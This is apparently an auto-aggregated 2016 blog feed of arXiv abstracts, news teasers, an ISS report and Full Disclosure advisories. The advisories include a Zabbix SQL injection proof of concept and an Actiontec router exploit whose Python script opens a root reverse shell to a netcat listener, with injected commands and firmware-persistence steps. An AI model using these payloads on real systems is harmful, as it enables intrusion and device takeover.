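b = np.array([1.0, 2.0])
print(mc_component(H, b, 0), np.linalg.solve(np.eye(2) - H, b)[0])  # ~2.0, 2.0
```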



from cs.AI updates on arXiv.org http://ift.tt/2biWRsM
via IFTTT

I have a new follower on Twitter


SPBMC PC
Sullivan Papain Block McGrath & Cannavo P.C. - New York, Long Island and New Jersey Personal Injury Lawyers.
New York, NY
http://t.co/Fq9LgMx6UG
Following: 53 - Followers: 25

August 16, 2016 at 04:44PM via Twitter http://twitter.com/SPBMCPC

Can Anonymous functions contain unknown variables?

Can anonymous functions contain unknown variables? Learn more about anonymous function, undefined variable.

from Google Alert - anonymous http://ift.tt/2aYp8RB
via IFTTT

Torza

There is an anonymous "Torza" on RISM that is described as a saltarello for lute. However, there is no incipit, so it is not possible to compare them to ...

from Google Alert - anonymous http://ift.tt/2bai1ZE
via IFTTT

Government vehicle accident in towson


via Instagram http://ift.tt/2bvGGWS

Someone is Spying on Researchers Behind VeraCrypt Security Audit

After TrueCrypt was mysteriously discontinued, VeraCrypt became the most popular open source disk encryption software used by activists, journalists, and privacy-conscious people. Due to the huge popularity of VeraCrypt, security researchers from the OSTIF (The Open Source Technology Improvement Fund) announced at the beginning of this month that the organization had agreed to audit VeraCrypt


from The Hacker News http://ift.tt/2bfou2F
via IFTTT

Internet Traffic Hijacking Linux Flaw Affects 80% of Android Devices

An estimated 80 percent of Android smartphones and tablets running Android 4.4 KitKat and higher are vulnerable to a recently disclosed Linux kernel flaw that allows hackers to terminate connections, spy on unencrypted traffic or inject malware into the parties' communications. Even the latest Android Nougat Preview is considered to be vulnerable. <!-- adsense --> The security flaw was first


from The Hacker News http://ift.tt/2b9b76V
via IFTTT

ISS Daily Summary Report – 08/15/2016

Mouse Epigenetics Cage Unit Maintenance: The crew completed standard maintenance for the Mouse Epigenetics experiment by refilling the Transportation Cage Units and Mouse Habitat Cage Unit with water and checking the water nozzles of the individual cages. The Mouse Epigenetics investigation studies altered gene expression patterns in the organs of male mice that spend one month in space, and also examines changes in the deoxyribonucleic acid (DNA) of their offspring. Results from the investigation identify genetic alterations that happen after exposure to the microgravity environment of space. NanoRacks Platforms-1 Module Removal: Four NanoRacks Modules were removed from NanoRacks Platform 1 and installed in the Minus Eighty-degree Freezer for ISS (MELFI).  NanoRacks Modules 43 (Slime Mold), 44 (Awty-Yeast Cell Growth in a Microgravity Environment), 45 (Duchesne-Light Wavelengths on Algae Production), and 46 (Duchesne-Plant Growth Chamber) will remain in MELFI until they return on SpX-9. At Home in Space Questionnaire: The CDR completed a questionnaire for the At Home in Space investigation. This Canadian Space Agency (CSA) experiment assesses culture, values, and psychosocial adaptation of astronauts to a space environment shared by multinational crews on long-duration missions. It is hypothesized that astronauts develop a shared space culture that is an adaptive strategy for handling cultural differences and they deal with the isolated confined environment of the space craft by creating a home in space.  NeuroMapping Operations: The crew performed testing in both a “strapped in” and ”free floating” body configuration for this investigation which studies whether long-duration spaceflight causes changes to the brain, including brain structure and function, motor control, and multi-tasking abilities. It also measures how long it would take for the brain and body to recover from possible changes. Previous research and anecdotal evidence from astronauts suggests movement control and cognition can be affected in microgravity. The NeuroMapping investigation performs structural and functional magnetic resonance brain imaging (MRI and fMRI) to assess any changes that occur after spending months on the ISS. Fluid Shifts Hardware Transfer and Service Module Setup: To prepare for Ultrasound activities in the Service Module (SM) this week, the crew transferred and set up hardware that supports the Fluid Shifts investigation from the Russian Segment. The experiment measures how much fluid shifts from the lower body to the upper body, in or out of cells and blood vessels, and determines the impact these shifts have on fluid pressure in the head, changes in vision and eye structures.  Fine Motor Skills: A series of interactive tasks on a touchscreen tablet was completed for the Fine Motor Skills investigation which tests skills needed to interact with technologies required in next-generation space vehicles, spacesuits, and habitats. The crewmember’s fine motor skills are also necessary for performing tasks in transit or on a planetary surface, such as information access, just-in-time training, subsystem maintenance, and medical treatment.  Extravehicular Activity (EVA) Preparations: The crew completed a procedures review in preparation for next Friday’s planned International Docking Adapter (IDA)2 EVA. Topics covered included prebreathe protocol review, Equipment Lock activities and suit donning plan, egress/ingress plan and EVA extension considerations. 
Following the review, the crew participated in a debrief with ground teams to discuss questions or concerns. The crew also verified that the Extravehicular Mobility Unit (EMU) glove heaters are functional and that the EMU TV is receiving power from the Rechargeable EVA Battery Assembly (REBA).

Waste and Hygiene Compartment (WHC): This morning the crew reported the WHC fan powered off during use, followed by a “Check Separator Light” illumination. The crew performed the standard troubleshooting procedure to clear the Check Separator Light. The WHC was returned to normal use upon completion of the malfunction procedure. Additionally, the crew reported they have been seeing the “Check Separator Light” on previous use. The engineering team has scheduled a coordination meeting tomorrow to discuss these developments.

Mobile Servicing System (MSS) Mobile Transporter (MT) Translation: Today, ground controllers moved the MSS MT from workstation 4 to workstation 6 in preparation for the removal of IDA2 from the SpaceX-9 trunk on Wednesday, and the installation of IDA2 onto PMA2 during the EVA on Friday.

LA Multiplexer/De-multiplexer (MDM) Patch: Ground controllers successfully loaded a patch to the LA 1 MDM in preparation for IDA installation.

Payload MDM Transition: Ground controllers were performing a scheduled PLMDM-2 High Rate Data Link (HRDL) reset which resulted in a complete lockup of the PLMDM-2 HRDL card. To recover from the HRDL card lockup, ground controllers performed a PLMDM transition. PLMDM-1 was subsequently powered ON and reconfigured as the primary PLMDM. All payload Health and Status (H&S) indications pre- and post-recovery were nominal. The PLMDM transition resulted in a loss of Health and Status for ~57 minutes.

Today’s Planned Activities
All were completed unless otherwise noted.
- Install 17КС.2076А-0 case onto SM ПрК thermal control pipework r/g 3003
- FINEMOTR – science ops run
- Video equipment installation for БД-2 exercise video shooting / r/g 2071
- Replace MRM2’s [ПФ1], [ПФ2] dust filters and [В1], [B2] fan grids
- On MCC Go test БД-2
- БД-2 exercise – 3
- MOUSE – h/w setup
- DRAGON. Cargo transfer ops
- WRS – water sample analysis
- XF305 camcorder setup
- EVA procedures’ final printout
- MOUSE – module water replacement
- MRM2 [ВД1] & [ВД2] air ducts vacuuming
- Video equipment de-installation for БД-2 exercise video shooting r/g 2071
- Mouse Epigenetics – Habitat 4 cleaning and Micro-G battery R&R, part 1
- АСУ’s [Е-К] container and hose R&R. Post-R&R АСУ activation / r/g 3061
- DAN. Science Ops run r/g 2780
- EVA procedure reviews
- INTER-MAI-75. [РЛС] h/w setup and activation. Refer to comment 6 r/g 3057
- On-orbit life photography and video / r/g 2747
- DAN. Science Ops run r/g 2780
- Review EVA-related IDA installation procedure
- AHIS. Questionnaire fill-up
- FLUID SHIFTS. Equipment transfer to ROS
- FLUID SHIFTS. Ultrasound 2 hardware install in SM
- Equipment preparation for PAO in LAB
- FLUID SHIFTS. Ultrasound equipment connection to [РБС] / r/g 3054
- Crew preparation for PAO / r/g 3060
- PAO with Pyaty Element Project team r/g 3060
- Mouse Epigenetics – Habitat 4 cleaning and Micro-G battery R&R, part 2
- NMAP – […]

from ISS On-Orbit Status Report http://ift.tt/2aQYRco
via IFTTT

Re: [FD] Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability

Re: [FD] Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability

Re: [FD] Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability

I actually ended up finding this vuln in a different vector (in the profileIdx2 parameter). /zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471054088083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfile=true&screenitemid=&period=3600&stime=20170813040734&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
Timestamp Value
No data found.
  • Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (39, 1, 'web.item.graph.period', '3600', 2, 2'3297)] [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3297)' at line 1]
  • Error in query [INSERT INTO profiles (profileid, userid, idx, value_str, type, idx2) VALUES (40, 1, 'web.item.graph.stime', '20160813041028', 3, 2'3297)] [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3297)' at line 1]
  • Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (41, 1, 'web.item.graph.isnow', '1', 2, 2'3297)] [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3297)' at line 1]
Similarly, it requires auth unless you enable Guest.

> On Aug 11, 2016, at 7:23 PM, 1n3@hushmail.com wrote:
>
> =========================================
> Title: Zabbix 3.0.3 SQL Injection Vulnerability
> Product: Zabbix
> Vulnerable Version(s): 2.2.x, 3.0.x
> Fixed Version: 3.0.4
> Homepage: http://www.zabbix.com
> Patch link: http://ift.tt/2aSpydV
> Credit: 1N3@CrowdShield
> ==========================================
>
> Vendor Description:
> =====================
> Zabbix is an open source availability and performance monitoring solution.
>
> Vulnerability Overview:
> =====================
> Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection vulnerability due to a failure to sanitize input in the toggle_ids array in the latest.php page.
>
> Business Impact:
> =====================
> By exploiting this SQL injection vulnerability, an authenticated attacker (or guest user) is able to gain full access to the database. This would allow an attacker to escalate their privileges to a power user, compromise the database, or execute commands on the underlying database operating system.
>
> Because of the functionalities Zabbix offers, an attacker with admin privileges (depending on the configuration) can execute arbitrary OS commands on the configured Zabbix hosts and server. This results in a severe impact to the monitored infrastructure.
>
> Although the attacker needs to be authenticated in general, the system could also be at risk if the adversary has no user account. Zabbix offers a guest mode which provides a low privileged default account for users without password. If this guest mode is enabled, the SQL injection vulnerability can be exploited unauthenticated.
>
> Proof of Concept:
> =====================
>
> latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
>
> Result:
> SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1)
> latest.php:746 → require_once() → CProfile::flush() → CProfile::insertDB() → DBexecute() in /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185
>
> Disclosure Timeline:
> =====================
> 7/18/2016 - Reported vulnerability to Zabbix
> 7/21/2016 - Zabbix responded with permission to file CVE and to disclose after a patch is made public
> 7/22/2016 - Zabbix released patch for vulnerability
> 8/3/2016 - CVE details submitted
> 8/11/2016 - Vulnerability details disclosed
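
Both vectors come down to the same bug class: request parameters concatenated into an INSERT statement. A generic illustration of the remediation, parameterized queries (sketched with Python's sqlite3 for brevity; Zabbix's frontend is PHP, so this is not the actual patch):

```
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE profiles (idx2 TEXT)")

idx2 = "2'3297"   # the injected value from the PoC above

# Vulnerable pattern: concatenation lets the quote escape the literal,
# reproducing the "error in your SQL syntax" messages shown above:
#   conn.execute("INSERT INTO profiles (idx2) VALUES (" + idx2 + ")")

# Fix: bind the value as a parameter; the driver handles quoting.
conn.execute("INSERT INTO profiles (idx2) VALUES (?)", (idx2,))
print(conn.execute("SELECT idx2 FROM profiles").fetchall())   # [("2'3297",)]
```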

Source: Gmail -> IFTTT-> Blogger

[FD] Taser Axon Dock (Body-Worn Camera Docking Station) v3.1 - Authentication Bypass

[FD] German Cable Provider Router (In)Security

Hey Guys,

I'm not sure if this is a new point, but I'm thinking about a possible security hole by design which may exist at many (German) cable providers.

German cable providers like Unitymedia/Kabel Deutschland provide you a Fritzbox or some other cable router for internet access. As you know, these routers have a MAC address on every interface, e.g. wifi, ethernet and so on. By default, the wifi SSID is publicly broadcast, and the SSID gives you the MAC of the wifi interface, right? If so, then you can calculate the MACs of the other interfaces by adding or subtracting one (or maybe two) from the last octet.

So, my theory: if you can fetch the SSID by wardriving, you can also derive the MACs of the other interfaces, especially of the cable interface. In other words, you should be able to calculate the MAC of any interface of the device.

If so: with a hardware debug interface you should be able to modify the firmware of a router like the well-known Fritzbox, which should give you the possibility to modify the MACs of its interfaces. If I'm right, it should then be easy to simply do some wardriving and collect some SSIDs from this provider. With this fetched, publicly available data I should be able to clone a Fritzbox.

As far as I know, routers like the Fritzbox get provisioned via the TR-069 protocol; the router identifies itself via MAC against a TR-069 provisioning server to get its configuration on first contact. So with this in mind, I should be able to clone the router, identify against a TR-069 server, grab the config from the TR-069 provisioning server and set up a clone of the official customer router.

Am I right, or am I missing something in this idea?

Best regards, Sebastian Michel
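
The derivation step is easy to put in code. A minimal sketch (assuming, as the post speculates, that a router's interface MACs are assigned sequentially around the Wi-Fi MAC; the offsets are hypothetical and vendor-specific):

```
def neighbor_macs(wifi_mac, offsets=(-2, -1, 1, 2)):
    """Yield candidate MACs for a router's other interfaces by
    offsetting the last octet of the Wi-Fi interface's MAC."""
    octets = [int(part, 16) for part in wifi_mac.split(":")]
    for off in offsets:
        candidate = octets[:-1] + [(octets[-1] + off) % 256]
        yield ":".join("{:02x}".format(o) for o in candidate)

# example with a made-up Wi-Fi MAC harvested from a beacon frame
print(list(neighbor_macs("00:11:22:33:44:56")))
```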

Source: Gmail -> IFTTT-> Blogger

[FD] Executable installers are vulnerable^WEVIL (case 39): MalwareBytes' "junkware removal tool" allows escalation of privilege

[FD] Actiontec T2200H (Telus Modem) Root Reverse Shell

### Device Details

Vendor: Actiontec (Telus branded, but may work on others)
Model: T2200H (but likely affecting other similar models of theirs)
Affected Firmware: T2200H-31.128L.03
Device Manual: http://ift.tt/1R1TWiC
Reported: November 2015
Status: Fixed in newly pushed firmware version
CVE: Not needed since the update is pushed by the provider.

The Telus Actiontec T2200H is Telus' standard bonded VDSL2 modem. It incorporates 2 VDSL2 bonded links with a built-in firewall, bridge mode, 802.11agn wireless, etc.

### Summary of Findings

- Root shell access can be obtained as long as an attacker has a login to the web UI. The password can always be reset by knowing the device serial number printed on the device, if the default password hasn't been changed.
- There are 2 separate firmware partitions (/dev/mtdblock0 and /dev/mtdblock1) that can be mounted read-write and then modified with additional files or configuration - surviving reboots and factory resets.
- TR-069 settings can be modified to not check in to the management server. This means that future updates would be impossible without flashing the device locally.

### Running single shell commands

Under Advanced Setup > Samba Configuration, update either the Samba Username or Password with the following: ";iptables -F". A USB flash drive needs to be plugged into the USB port on the rear of the modem when running the exploit from the web GUI. Anything run in this field is executed as the root user.

Now after running nmap, all listening ports are open:

$ nmap -p 1-10000 192.168.1.254
Starting Nmap 6.49SVN ( https://nmap.org ) at 2015-11-08 22:14 MST
Nmap scan report for 192.168.1.254
Host is up (0.016s latency).
Not shown: 9991 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
5431/tcp open park-agent
7547/tcp open unknown

### Obtaining reverse root shell

Create a netcat session locally:

nc -k -l 5555

Next we'll run the following Python code to pipe /bin/sh back to us. Before running it, you will need to log in successfully to the web UI through http://192.168.1.254. 192.168.1.9 is the IP of the machine listening on netcat.

```
import requests

s = requests.session()
smb_post = {
    "action": "savapply",
    "smbdEnable": '1',
    "smbdPasswd": "123",
    "smbdUserid": ";rm /var/fifo2; mknod /var/fifo2 p",
    "smbdVolume": 'usb1_1',
    "smbdWorkgroup": "WORKGROUP"}

# creating the fifo pipe
s.post("http://ift.tt/2bjYExD", smb_post)

smb_post["smbdUserid"] = ";cat /var/fifo2 |/bin/sh -i 2>&1 |nc 192.168.1.9 5555 > /var/fifo2"

# Using the pipe to send a shell over netcat
s.post("http://ift.tt/2bjYExD", smb_post)
```

Your netcat listener should now be prompted with a root BusyBox shell:

$ nc -k -l 5555
BusyBox v1.17.2 (2013-12-27 18:49:15 PST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# cat /etc/image_version
T2200H-311283BGW0011043
#

### Other Discoveries

Mounting root filesystem read+write: `mount -t jffs2 -o remount,rw mtd:rootfs`

Mounting partition 2 read-write: `mount -t jffs2 -o rw /dev/mtdblock1 /mnt`

To allow unrestricted access to the web features (enabling telnet, firmware flash, TR-069 configuration, etc.) after the root filesystem is mounted read-write:

```
cat /webs/perm.txt | sed 's/ 4/ 7/' > /webs/perm.txt
cat /webs/perm2.txt | sed 's/ 4/ 7/' > /webs/perm2.txt
killall -HUP httpd
```

Source: Gmail -> IFTTT-> Blogger

An Anonymous User Authentication and Key Agreement Scheme Based on a Symmetric ...

In this paper, we describe how these attacks work, and propose an enhanced anonymous user authentication and key agreement scheme based on a ...

from Google Alert - anonymous http://ift.tt/2bmyFD9
via IFTTT

China Launches World's 1st 'Hack-Proof' Quantum Communication Satellite

China has taken one more step towards achieving success in quantum communication technology. China has launched the world's first quantum communications satellite into orbit aboard a Long March-2D rocket earlier today in order to test the fundamental laws of quantum mechanics in space. 'Hack-Proof' Communications System The satellite, dubbed Quantum Science Satellite, is designed


from The Hacker News http://ift.tt/2bjLBwb
via IFTTT

I have a new follower on Twitter


Carl-G Schimmelmann

Denmark
http://t.co/1OZlLz5z6O
Following: 7520 - Followers: 8195

August 16, 2016 at 12:54AM via Twitter http://twitter.com/TimeXtenderDWA

Human as Spaceship


You are a spaceship soaring through the universe. So is your dog. We all carry with us trillions of microorganisms as we go through life. These multitudes of bacteria, fungi, and archaea have different DNA than you. Collectively called your microbiome, your shipmates outnumber your own cells. Your crew members form communities, help digest food, engage in battles against intruders, and sometimes commute on a liquid superhighway from one end of your body to the other. Much of what your microbiome does, however, remains unknown. You are the captain, but being nice to your crew may allow you to explore more of your local cosmos. via NASA http://ift.tt/2aW739w

Monday, August 15, 2016

I have a new follower on Twitter


Kate Blanchard
Biotech co-founder @ORIG3N_Inc, technology enthusiast, driven to extend lives with regenerative medicine. #boston #ohiostate @kenanflagler
Boston, MA
https://t.co/z9WCZJqJyH
Following: 8988 - Followers: 9872

August 15, 2016 at 10:09PM via Twitter http://twitter.com/KateSBlanchard

I have a new follower on Twitter


Mark Crone
Passionate about #Travel & #Tourism, #TravelTips & #TravelReviews; @UniglobeBizTrvl, @CdnSkiPatrol, contributor @Liftopia, @thehipmunk; #Blogger on my blog:
Toronto, Canada
https://t.co/HmHV6EKbtH
Following: 11355 - Followers: 13901

August 15, 2016 at 10:09PM via Twitter http://twitter.com/MarkTravel

Determining Health Utilities through Data Mining of Social Media. (arXiv:1608.03938v1 [cs.CL])

'Health utilities' measure patient preferences for perfect health compared to specific unhealthy states, such as asthma, a fractured hip, or colon cancer. When integrated over time, these estimations are called quality adjusted life years (QALYs). Until now, characterizing health utilities (HUs) required detailed patient interviews or written surveys. While reliable and specific, this data remained costly due to efforts to locate, enlist and coordinate participants. Thus the scope, context and temporality of diseases examined has remained limited.

Now that more than a billion people use social media, we propose a novel strategy: use natural language processing to analyze public online conversations for signals of the severity of medical conditions and correlate these to known HUs using machine learning. In this work, we filter a dataset that originally contained 2 billion tweets for relevant content on 60 diseases. Using this data, our algorithm successfully distinguished mild from severe diseases, which had previously been categorized only by traditional techniques. This represents progress towards two related applications: first, predicting HUs where such information is nonexistent; and second, (where rich HU data already exists) estimating temporal or geographic patterns of disease severity through data mining.



from cs.AI updates on arXiv.org http://ift.tt/2aXlAlu
via IFTTT

Can Peripheral Representations Improve Clutter Metrics on Complex Scenes?. (arXiv:1608.04042v1 [cs.CV])

Previous studies have proposed image-based clutter measures that correlate with human search times and/or eye movements. However, most models do not take into account the fact that the effects of clutter interact with the foveated nature of the human visual system: visual clutter further from the fovea has an increasing detrimental influence on perception. Here, we introduce a new foveated clutter model to predict the detrimental effects in target search utilizing a forced fixation search task. We use Feature Congestion (Rosenholtz et al.) as our non-foveated clutter model, and we stack a peripheral architecture on top of Feature Congestion for our foveated model. We introduce the Peripheral Integration Feature Congestion (PIFC) coefficient, as a fundamental ingredient of our model that modulates clutter as a non-linear gain contingent on eccentricity. We finally show that Foveated Feature Congestion (FFC) clutter scores r(44) = -0.82 correlate better with target detection (hit rate) than regular Feature Congestion r(44) = -0.19 in forced fixation search. Thus, our model allows us to enrich clutter perception research by computing fixation-specific clutter maps. A toolbox for creating peripheral architectures: Piranhas: Peripheral Architectures for Natural, Hybrid and Artificial Systems will be made available.



from cs.AI updates on arXiv.org http://ift.tt/2aVsbcP
via IFTTT

A Geometric Framework for Convolutional Neural Networks. (arXiv:1608.04374v1 [stat.ML])

In this paper, a geometric framework for neural networks is proposed. This framework uses the inner product space structure underlying the parameter set to perform gradient descent not in a component-based form, but in a coordinate-free manner. Convolutional neural networks are described in this framework in a compact form, with the gradients of standard --- and higher-order --- loss functions calculated for each layer of the network. This approach can be applied to other network structures and provides a basis on which to create new networks.



from cs.AI updates on arXiv.org http://ift.tt/2aVrn7O
via IFTTT

A Parallel Algorithm for Exact Bayesian Structure Discovery in Bayesian Networks. (arXiv:1408.1664v3 [cs.AI] UPDATED)

Exact Bayesian structure discovery in Bayesian networks requires exponential time and space. Using dynamic programming (DP), the fastest known sequential algorithm computes the exact posterior probabilities of structural features in $O(2(d+1)n2^n)$ time and space, if the number of nodes (variables) in the Bayesian network is $n$ and the in-degree (the number of parents) per node is bounded by a constant $d$. Here we present a parallel algorithm capable of computing the exact posterior probabilities for all $n(n-1)$ edges with optimal parallel space efficiency and nearly optimal parallel time efficiency. That is, if $p=2^k$ processors are used, the run-time reduces to $O(5(d+1)n2^{n-k}+k(n-k)^d)$ and the space usage becomes $O(n2^{n-k})$ per processor. Our algorithm is based on the observation that the subproblems in the sequential DP algorithm constitute an $n$-dimensional hypercube. We carefully coordinate the computation of the correlated DP procedures so that large amounts of data exchange are suppressed. Further, we develop parallel techniques for two variants of the well-known \emph{zeta transform}, which have applications outside the context of Bayesian networks. We demonstrate the capability of our algorithm on datasets with up to 33 variables and its scalability on up to 2048 processors. We apply our algorithm to a biological data set for discovering the yeast pheromone response pathways.



from cs.AI updates on arXiv.org http://ift.tt/1nxBLRX
via IFTTT

Natural Language Generation enhances human decision-making with uncertain information. (arXiv:1606.03254v2 [cs.CL] UPDATED)

Decision-making is often dependent on uncertain data, e.g. data associated with confidence scores or probabilities. We present a comparison of different information presentations for uncertain data and, for the first time, measure their effects on human decision-making. We show that the use of Natural Language Generation (NLG) improves decision-making under uncertainty, compared to state-of-the-art graphical-based representation methods. In a task-based study with 442 adults, we found that presentations using NLG lead to 24% better decision-making on average than the graphical presentations, and to 44% better decision-making when NLG is combined with graphics. We also show that women achieve significantly better results when presented with NLG output (an 87% increase on average compared to graphical presentations).



from cs.AI updates on arXiv.org http://ift.tt/1UuC2Gc
via IFTTT

Fully DNN-based Multi-label regression for audio tagging. (arXiv:1606.07695v2 [cs.CV] UPDATED)

Acoustic event detection for content analysis in most cases relies on lots of labeled data. However, manually annotating data is a time-consuming task, which thus makes few annotated resources available so far. Unlike audio event detection, automatic audio tagging, a multi-label acoustic event classification task, only relies on weakly labeled data. This is highly desirable to some practical applications using audio analysis. In this paper we propose to use a fully deep neural network (DNN) framework to handle the multi-label classification task in a regression way. Considering that only chunk-level rather than frame-level labels are available, the whole or almost whole frames of the chunk were fed into the DNN to perform a multi-label regression for the expected tags. The fully DNN, which is regarded as an encoding function, can well map the audio features sequence to a multi-tag vector. A deep pyramid structure was also designed to extract more robust high-level features related to the target tags. Further improved methods were adopted, such as the Dropout and background noise aware training, to enhance its generalization capability for new audio recordings in mismatched environments. Compared with the conventional Gaussian Mixture Model (GMM) and support vector machine (SVM) methods, the proposed fully DNN-based method could well utilize the long-term temporal information with the whole chunk as the input. The results show that our approach obtained a 15% relative improvement compared with the official GMM-based method of DCASE 2016 challenge.



from cs.AI updates on arXiv.org http://ift.tt/28X80gY
via IFTTT

CaR-FOREST: Joint Classification-Regression Decision Forests for Overlapping Audio Event Detection. (arXiv:1607.02306v2 [cs.SD] UPDATED)

This report describes our submissions to Task2 and Task3 of the DCASE 2016 challenge. The systems aim at dealing with the detection of overlapping audio events in continuous streams, where the detectors are based on random decision forests. The proposed forests are jointly trained for classification and regression simultaneously. Initially, the training is classification-oriented to encourage the trees to select discriminative features from overlapping mixtures to separate positive audio segments from the negative ones. The regression phase is then carried out to let the positive audio segments vote for the event onsets and offsets, and therefore model the temporal structure of audio events. One random decision forest is specifically trained for each event category of interest. Experimental results on the development data show that our systems significantly outperform the baseline on the Task2 evaluation while they are inferior to the baseline in the Task3 evaluation.



from cs.AI updates on arXiv.org http://ift.tt/29wGQ3s
via IFTTT

Towards Analytics Aware Ontology Based Access to Static and Streaming Data (Extended Version). (arXiv:1607.05351v2 [cs.AI] UPDATED)

Real-time analytics that requires integration and aggregation of heterogeneous and distributed streaming and static data is a typical task in many industrial scenarios such as diagnostics of turbines in Siemens. The OBDA approach has great potential to facilitate such tasks; however, it has a number of limitations in dealing with analytics that restrict its use in important industrial applications. Based on our experience with Siemens, we argue that in order to overcome those limitations OBDA should be extended and become analytics, source, and cost aware. In this work we propose such an extension. In particular, we propose an ontology, mapping, and query language for OBDA, where aggregate and other analytical functions are first-class citizens. Moreover, we develop query optimisation techniques that allow analytical tasks over static and streaming data to be processed efficiently. We implement our approach in a system and evaluate it with Siemens turbine data.



from cs.AI updates on arXiv.org http://ift.tt/29TO2Et
via IFTTT

Anonymous donor gives trike to disabled man

Ralph Shaffer, 58, was surprised with a new tricycle Friday. An anonymous donor purchased the trike and asked village workers to put it together for ...

from Google Alert - anonymous http://ift.tt/2btUx0I
via IFTTT

NSA's Hacking Group Hacked! Bunch of Private Hacking Tools Leaked Online

It seems like the NSA has been HACKED! An unknown hacker or a group of hackers just claimed to have hacked into "Equation Group" -- a cyber-attack group allegedly associated with the United States intelligence organization NSA -- and dumped a bunch of its hacking tools (malware, private exploits, and hacking tools) online. <!-- adsense --> Not just this, the hackers, calling themselves "The


from The Hacker News http://ift.tt/2aW5gV7
via IFTTT

[FD] Persistent Cross-Site Scripting in Magic Fields 1 WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Persistent Cross-Site Scripting in Magic Fields 2 WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting in Link Library WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Ajax Load More Local File Inclusion vulnerability

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting/Cross-Site Request Forgery in Peter's Login Redirect WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Request Forgery vulnerability in Email Users WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting vulnerability in Google Maps WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Stored Cross-Site Scripting vulnerability in Photo Gallery WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows deleting of images

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows deleting of galleries

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows adding of images

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

Ravens: LB Terrell Suggs releases statement after his first practice in 11 months, says "Darth Sizzle is back" (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Python Eggs
#python addict
Paris, Ile-de-France

Following: 2141 - Followers: 2655

August 15, 2016 at 12:12PM via Twitter http://twitter.com/PythonEggs

This basically anonymous fund manager oversees $800bn

Take a rare look behind the scenes at an index fund with Vanguard's Gerry O'Reilly, manager of the world's largest mutual fund.

from Google Alert - anonymous http://ift.tt/2bykFuw
via IFTTT

D8: Anonymous users can see unpublished content

... Permission lets anonymous users access unpublished content. "View own unpublished content" is not set for anonymous users. Patch coming.

from Google Alert - anonymous http://ift.tt/2bsGnw5
via IFTTT

How to tune hyperparameters with Python and scikit-learn

In last week’s post, I introduced the k-NN machine learning algorithm which we then applied to the task of image classification.

Using the k-NN algorithm, we obtained 57.58% classification accuracy on the Kaggle Dogs vs. Cats dataset challenge:

Figure 1: Classifying an image as whether it contains a dog or a cat.

The question is: “Can we do better?”

Of course we can! Obtaining higher accuracy for nearly any machine learning algorithm boils down to tweaking various knobs and levers.

In the case of k-NN, we can tune k, the number of nearest neighbors. We can also tune our distance metric/similarity function as well.

Of course, hyperparameter tuning has implications outside of the k-NN algorithm as well. In the context of Deep Learning and Convolutional Neural Networks, we can easily have hundreds of various hyperparameters to tune and play with (although in practice we try to limit the number of variables to tune to a small handful), each affecting our overall classification to some (potentially unknown) degree.

Because of this, it’s important to understand the concept of hyperparameter tuning and how your choice in hyperparameters can dramatically impact your classification accuracy.

How to tune hyperparameters with Python and scikit-learn

In the remainder of today’s tutorial, I’ll be demonstrating how to tune k-NN hyperparameters for the Dogs vs. Cats dataset. We’ll start with a discussion on what hyperparameters are, followed by viewing a concrete example on tuning k-NN hyperparameters.

We’ll then explore how to tune k-NN hyperparameters using two search methods: Grid Search and Randomized Search.

As our results will demonstrate, we can improve our classification accuracy from 57.58% to over 64%!

What are hyperparameters?

Hyperparameters are simply the knobs and levers you pull and turn when building a machine learning classifier. The process of tuning hyperparameters is more formally called hyperparameter optimization.

So what’s the difference between a normal “model parameter” and a “hyperparameter”?

Well, a standard “model parameter” is normally an internal variable that is optimized in some fashion. In the context of Linear Regression, Logistic Regression, and Support Vector Machines, we would think of parameters as the weight vector coefficients found by the learning algorithm.

On the other hand, “hyperparameters” are normally set by a human designer or tuned via algorithmic approaches. Examples of hyperparameters include the number of neighbors k in the k-Nearest Neighbor algorithm, the learning rate alpha of a Neural Network, or the number of filters learned in a given convolutional layer in a CNN.

